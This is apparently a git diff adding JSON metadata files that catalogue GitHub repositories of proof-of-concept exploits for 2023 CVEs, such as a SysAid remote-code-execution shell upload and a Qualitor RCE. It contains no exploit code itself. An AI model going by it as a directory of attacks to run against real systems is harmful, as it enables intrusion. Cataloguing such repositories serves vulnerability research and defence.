646888960, + "name": "cve-2023-46813-poc", + "full_name": "Freax13\/cve-2023-46813-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2023-46813-poc", + "description": null, + "fork": false, + "created_at": "2023-05-29T15:10:43Z", + "updated_at": "2024-08-08T20:02:03Z", + "pushed_at": "2024-01-07T15:20:55Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46818.json b/2023/CVE-2023-46818.json new file mode 100644 index 0000000000..a22de02f82 --- /dev/null +++ b/2023/CVE-2023-46818.json @@ -0,0 +1,33 @@ +[ + { + "id": 869481497, + "name": "CVE-2023-46818-python-exploit", + "full_name": "bipbopbup\/CVE-2023-46818-python-exploit", + "owner": { + "login": "bipbopbup", + "id": 24678431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24678431?v=4", + "html_url": "https:\/\/github.com\/bipbopbup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bipbopbup\/CVE-2023-46818-python-exploit", + "description": "CVE-2023-46818 IPSConfig Python exploit", + "fork": false, + "created_at": "2024-10-08T11:22:16Z", + "updated_at": "2024-10-08T11:46:57Z", + "pushed_at": "2024-10-08T11:46:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4683.json b/2023/CVE-2023-4683.json new file mode 100644 index 0000000000..c4795f488f --- /dev/null +++ b/2023/CVE-2023-4683.json @@ -0,0 +1,33 @@ +[ + { + "id": 697961473, + "name": "CVE-2023-4683-Test", + "full_name": "Songg45\/CVE-2023-4683-Test", + "owner": { + "login": "Songg45", + "id": 22947231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22947231?v=4", + "html_url": "https:\/\/github.com\/Songg45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Songg45\/CVE-2023-4683-Test", + "description": "CVE-2023-4683 - Test", + "fork": false, + "created_at": "2023-09-28T20:49:33Z", + "updated_at": "2024-05-08T01:09:58Z", + "pushed_at": "2023-09-28T21:29:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46865.json b/2023/CVE-2023-46865.json new file mode 100644 index 0000000000..00e1438610 --- /dev/null +++ b/2023/CVE-2023-46865.json @@ -0,0 +1,33 @@ +[ + { + "id": 716779558, + "name": "Crater-CVE-2023-46865-RCE", + "full_name": "asylumdx\/Crater-CVE-2023-46865-RCE", + "owner": { + "login": "asylumdx", + "id": 68108995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68108995?v=4", + "html_url": "https:\/\/github.com\/asylumdx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asylumdx\/Crater-CVE-2023-46865-RCE", + "description": "Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)", + "fork": false, + "created_at": "2023-11-09T21:22:47Z", + "updated_at": "2024-03-05T08:55:59Z", + "pushed_at": "2023-11-10T07:50:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46870.json b/2023/CVE-2023-46870.json new file mode 100644 index 0000000000..7a76ad62ed --- /dev/null +++ b/2023/CVE-2023-46870.json @@ -0,0 +1,33 @@ +[ + { + "id": 798984358, + "name": "CVE-2023-46870", + "full_name": "Chapoly1305\/CVE-2023-46870", + "owner": { + "login": "Chapoly1305", + "id": 25316415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25316415?v=4", + "html_url": "https:\/\/github.com\/Chapoly1305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chapoly1305\/CVE-2023-46870", + "description": null, + "fork": false, + "created_at": "2024-05-10T22:18:53Z", + "updated_at": "2024-06-13T23:36:56Z", + "pushed_at": "2024-06-13T23:36:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46948.json b/2023/CVE-2023-46948.json new file mode 100644 index 0000000000..641e11c87e --- /dev/null +++ b/2023/CVE-2023-46948.json @@ -0,0 +1,33 @@ +[ + { + "id": 709837062, + "name": "CVE-2023-46948", + "full_name": "AzraelsBlade\/CVE-2023-46948", + "owner": { + "login": "AzraelsBlade", + "id": 148983455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148983455?v=4", + "html_url": "https:\/\/github.com\/AzraelsBlade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AzraelsBlade\/CVE-2023-46948", + "description": null, + "fork": false, + "created_at": "2023-10-25T13:50:41Z", + "updated_at": "2024-08-10T10:48:12Z", + "pushed_at": "2024-08-10T10:48:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46954.json b/2023/CVE-2023-46954.json new file mode 100644 index 0000000000..df82f5ea4c --- /dev/null +++ b/2023/CVE-2023-46954.json @@ -0,0 +1,33 @@ +[ + { + "id": 713406536, + "name": "CVE-2023-46954", + "full_name": "jakedmurphy1\/CVE-2023-46954", + "owner": { + "login": "jakedmurphy1", + "id": 44781280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44781280?v=4", + "html_url": "https:\/\/github.com\/jakedmurphy1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakedmurphy1\/CVE-2023-46954", + "description": null, + "fork": false, + "created_at": "2023-11-02T13:09:52Z", + "updated_at": "2023-11-02T13:09:52Z", + "pushed_at": "2023-11-08T18:44:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4696.json b/2023/CVE-2023-4696.json new file mode 100644 index 0000000000..5c5d9c3c32 --- /dev/null +++ b/2023/CVE-2023-4696.json @@ -0,0 +1,33 @@ +[ + { + "id": 685896765, + "name": "CVE-2023-4696", + "full_name": "mnqazi\/CVE-2023-4696", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4696", + "description": "https:\/\/medium.com\/@mnqazi\/cve-2023-4696-account-takeover-due-to-improper-handling-of-jwt-tokens-in-memos-v0-13-2-13104e1412f3", + "fork": false, + "created_at": "2023-09-01T09:02:03Z", + "updated_at": "2023-09-01T09:02:04Z", + "pushed_at": "2023-09-01T09:07:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46974.json b/2023/CVE-2023-46974.json new file mode 100644 index 0000000000..7f768aa28c --- /dev/null +++ b/2023/CVE-2023-46974.json @@ -0,0 +1,33 @@ +[ + { + "id": 713487289, + "name": "CVE-2023-46974", + "full_name": "yte121\/CVE-2023-46974", + "owner": { + "login": "yte121", + "id": 55489792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4", + "html_url": "https:\/\/github.com\/yte121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yte121\/CVE-2023-46974", + "description": "POC", + "fork": false, + "created_at": "2023-11-02T16:08:19Z", + "updated_at": "2023-11-02T16:08:20Z", + "pushed_at": "2023-11-02T16:09:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4698.json b/2023/CVE-2023-4698.json new file mode 100644 index 0000000000..24c21dec06 --- /dev/null +++ b/2023/CVE-2023-4698.json @@ -0,0 +1,33 @@ +[ + { + "id": 685905090, + "name": "CVE-2023-4698", + "full_name": "mnqazi\/CVE-2023-4698", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4698", + "description": null, + "fork": false, + "created_at": "2023-09-01T09:24:08Z", + "updated_at": "2023-09-08T12:33:05Z", + "pushed_at": "2023-09-04T05:47:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46980.json b/2023/CVE-2023-46980.json new file mode 100644 index 0000000000..20ac049d3d --- /dev/null +++ b/2023/CVE-2023-46980.json @@ -0,0 +1,33 @@ +[ + { + "id": 713486009, + "name": "CVE-2023-46980", + "full_name": "sajaljat\/CVE-2023-46980", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46980", + "description": null, + "fork": false, + "created_at": "2023-11-02T16:05:23Z", + "updated_at": "2023-11-02T16:05:24Z", + "pushed_at": "2023-11-02T16:09:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4699.json b/2023/CVE-2023-4699.json new file mode 100644 index 0000000000..da88096d95 --- /dev/null +++ b/2023/CVE-2023-4699.json @@ -0,0 +1,33 @@ +[ + { + "id": 720198895, + "name": "Citrix-Bleed-Buffer-Overread-Demo", + "full_name": "Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo", + "owner": { + "login": "Scottzxor", + "id": 65826410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65826410?v=4", + "html_url": "https:\/\/github.com\/Scottzxor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo", + "description": "This code functionally approximates the Citrix Bleed vulnerability (CVE-2023-4699).", + "fork": false, + "created_at": "2023-11-17T19:55:30Z", + "updated_at": "2023-11-20T06:22:48Z", + "pushed_at": "2023-11-17T20:01:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46998.json b/2023/CVE-2023-46998.json new file mode 100644 index 0000000000..91da9cd606 --- /dev/null +++ b/2023/CVE-2023-46998.json @@ -0,0 +1,33 @@ +[ + { + "id": 713074877, + "name": "CVE-2023-46998", + "full_name": "soy-oreocato\/CVE-2023-46998", + "owner": { + "login": "soy-oreocato", + "id": 79870826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79870826?v=4", + "html_url": "https:\/\/github.com\/soy-oreocato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soy-oreocato\/CVE-2023-46998", + "description": null, + "fork": false, + "created_at": "2023-11-01T19:36:38Z", + "updated_at": "2023-12-19T12:57:31Z", + "pushed_at": "2023-11-01T19:41:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47014.json b/2023/CVE-2023-47014.json new file mode 100644 index 0000000000..78371c763b --- /dev/null +++ b/2023/CVE-2023-47014.json @@ -0,0 +1,33 @@ +[ + { + "id": 718503412, + "name": "CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "full_name": "emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "owner": { + "login": "emirhanerdogu", + "id": 32299032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32299032?v=4", + "html_url": "https:\/\/github.com\/emirhanerdogu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "description": null, + "fork": false, + "created_at": "2023-11-14T08:08:08Z", + "updated_at": "2023-12-03T08:21:31Z", + "pushed_at": "2023-11-14T08:34:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47102.json b/2023/CVE-2023-47102.json new file mode 100644 index 0000000000..b976fde05c --- /dev/null +++ b/2023/CVE-2023-47102.json @@ -0,0 +1,33 @@ +[ + { + "id": 720393369, + "name": "CVE-2023-47102", + "full_name": "nitipoom-jar\/CVE-2023-47102", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47102", + "description": null, + "fork": false, + "created_at": "2023-11-18T10:52:40Z", + "updated_at": "2023-11-18T12:30:55Z", + "pushed_at": "2023-11-18T12:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47108.json b/2023/CVE-2023-47108.json new file mode 100644 index 0000000000..b9ccb44cc9 --- /dev/null +++ b/2023/CVE-2023-47108.json @@ -0,0 +1,33 @@ +[ + { + "id": 819728794, + "name": "govuln-CVE-2023-47108", + "full_name": "bahe-msft\/govuln-CVE-2023-47108", + "owner": { + "login": "bahe-msft", + "id": 73816700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73816700?v=4", + "html_url": "https:\/\/github.com\/bahe-msft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bahe-msft\/govuln-CVE-2023-47108", + "description": null, + "fork": false, + "created_at": "2024-06-25T05:05:26Z", + "updated_at": "2024-06-25T05:08:40Z", + "pushed_at": "2024-06-25T05:08:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47119.json b/2023/CVE-2023-47119.json new file mode 100644 index 0000000000..b1308cba97 --- /dev/null +++ b/2023/CVE-2023-47119.json @@ -0,0 +1,64 @@ +[ + { + "id": 717901692, + "name": "CVE-2023-47119", + "full_name": "BaadMaro\/CVE-2023-47119", + "owner": { + "login": "BaadMaro", + "id": 72421091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72421091?v=4", + "html_url": "https:\/\/github.com\/BaadMaro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaadMaro\/CVE-2023-47119", + "description": "A POC for CVE-2023-47119", + "fork": false, + "created_at": "2023-11-12T23:34:07Z", + "updated_at": "2023-11-16T13:35:52Z", + "pushed_at": "2023-11-17T16:40:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733767538, + "name": "CVE-2023-47119", + "full_name": "Cristiano100\/CVE-2023-47119", + "owner": { + "login": "Cristiano100", + "id": 59809524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59809524?v=4", + "html_url": "https:\/\/github.com\/Cristiano100", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cristiano100\/CVE-2023-47119", + "description": null, + "fork": false, + "created_at": "2023-12-20T04:43:15Z", + "updated_at": "2023-12-21T06:28:47Z", + "pushed_at": "2023-12-20T04:43:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47129.json b/2023/CVE-2023-47129.json new file mode 100644 index 0000000000..f958a0ad2b --- /dev/null +++ b/2023/CVE-2023-47129.json @@ -0,0 +1,33 @@ +[ + { + "id": 718117758, + "name": "CVE-2023-47129", + "full_name": "Cyber-Wo0dy\/CVE-2023-47129", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-47129", + "description": "Statamic CMS versions <4.33.0 vulnerable to \"Remote Code Execution\" ", + "fork": false, + "created_at": "2023-11-13T12:21:52Z", + "updated_at": "2024-01-23T20:00:05Z", + "pushed_at": "2023-11-13T12:24:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47179.json b/2023/CVE-2023-47179.json new file mode 100644 index 0000000000..ecd7620912 --- /dev/null +++ b/2023/CVE-2023-47179.json @@ -0,0 +1,33 @@ +[ + { + "id": 713813686, + "name": "CVE-2023-47179", + "full_name": "RandomRobbieBF\/CVE-2023-47179", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47179", + "description": "WooODT Lite <= 2.4.6 - Missing Authorization to Arbitrary Options Update (Subscriber+)", + "fork": false, + "created_at": "2023-11-03T09:39:30Z", + "updated_at": "2024-08-12T20:32:59Z", + "pushed_at": "2023-11-03T10:26:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47218.json b/2023/CVE-2023-47218.json new file mode 100644 index 0000000000..d0042a3c11 --- /dev/null +++ b/2023/CVE-2023-47218.json @@ -0,0 +1,33 @@ +[ + { + "id": 759618943, + "name": "CVE-2023-47218", + "full_name": "passwa11\/CVE-2023-47218", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-47218", + "description": "CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)", + "fork": false, + "created_at": "2024-02-19T02:15:21Z", + "updated_at": "2024-02-19T02:15:22Z", + "pushed_at": "2024-02-19T02:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47246.json b/2023/CVE-2023-47246.json new file mode 100644 index 0000000000..81cff7330c --- /dev/null +++ b/2023/CVE-2023-47246.json @@ -0,0 +1,136 @@ +[ + { + "id": 719913434, + "name": "CVE-2023-47246-EXP", + "full_name": "W01fh4cker\/CVE-2023-47246-EXP", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-47246-EXP", + "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)", + "fork": false, + "created_at": "2023-11-17T07:03:06Z", + "updated_at": "2024-10-22T17:59:22Z", + "pushed_at": "2023-12-07T02:55:01Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2023-47246", + "exploit", + "redteam", + "sysaid" + ], + "visibility": "public", + "forks": 13, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 721997669, + "name": "CVE-2023-47246", + "full_name": "rainbowhatrkn\/CVE-2023-47246", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-47246", + "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)", + "fork": false, + "created_at": "2023-11-22T08:13:51Z", + "updated_at": "2023-11-22T08:13:52Z", + "pushed_at": "2023-11-22T08:13:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721999227, + "name": "CVE-2023-47246", + "full_name": "tucommenceapousser\/CVE-2023-47246", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-47246", + "description": null, + "fork": false, + "created_at": "2023-11-22T08:18:11Z", + "updated_at": "2023-11-24T03:09:53Z", + "pushed_at": "2023-11-23T05:07:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892941082, + "name": "cve-2023-47246-poc", + "full_name": "XiaomingX\/cve-2023-47246-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2023-47246-poc", + "description": "CVE-2023-47246 是 SysAid On-Premise 软件(版本 23.3.36 之前)中的一个路径遍历漏洞。攻击者可以利用该漏洞将文件写入 Tomcat 的 webroot 目录,从而在服务器上执行任意代码。", + "fork": false, + "created_at": "2024-11-23T05:21:22Z", + "updated_at": "2024-11-24T06:37:21Z", + "pushed_at": "2024-11-23T05:24:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47253.json b/2023/CVE-2023-47253.json new file mode 100644 index 0000000000..d9b7303b00 --- /dev/null +++ b/2023/CVE-2023-47253.json @@ -0,0 +1,64 @@ +[ + { + "id": 859921995, + "name": "CVE-2023-47253", + "full_name": "OpenXP-Research\/CVE-2023-47253", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2023-47253", + "description": "CVE-2023-47253 | Qualitor <= 8.20 RCE", + "fork": false, + "created_at": "2024-09-19T14:06:47Z", + "updated_at": "2024-10-30T15:04:49Z", + "pushed_at": "2024-10-30T15:03:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 860037261, + "name": "CVE-2023-47253", + "full_name": "gmh5225\/CVE-2023-47253", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-47253", + "description": "CVE-2023-47253 | Qualitor <= 8.20 RCE", + "fork": false, + "created_at": "2024-09-19T17:52:40Z", + "updated_at": "2024-09-19T17:52:40Z", + "pushed_at": "2024-09-19T14:01:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47355.json b/2023/CVE-2023-47355.json new file mode 100644 index 0000000000..8f3cbf5aff --- /dev/null +++ b/2023/CVE-2023-47355.json @@ -0,0 +1,35 @@ +[ + { + "id": 712696330, + "name": "com.eypcnnapps.quickreboot", + "full_name": "actuator\/com.eypcnnapps.quickreboot", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.eypcnnapps.quickreboot", + "description": "CVE-2023-47355", + "fork": false, + "created_at": "2023-11-01T02:02:16Z", + "updated_at": "2024-02-02T02:41:58Z", + "pushed_at": "2023-11-01T02:41:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47355" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47400.json b/2023/CVE-2023-47400.json new file mode 100644 index 0000000000..3880e30bb5 --- /dev/null +++ b/2023/CVE-2023-47400.json @@ -0,0 +1,37 @@ +[ + { + "id": 748574391, + "name": "CVE-2023-47400", + "full_name": "LucasVanHaaren\/CVE-2023-47400", + "owner": { + "login": "LucasVanHaaren", + "id": 29121316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29121316?v=4", + "html_url": 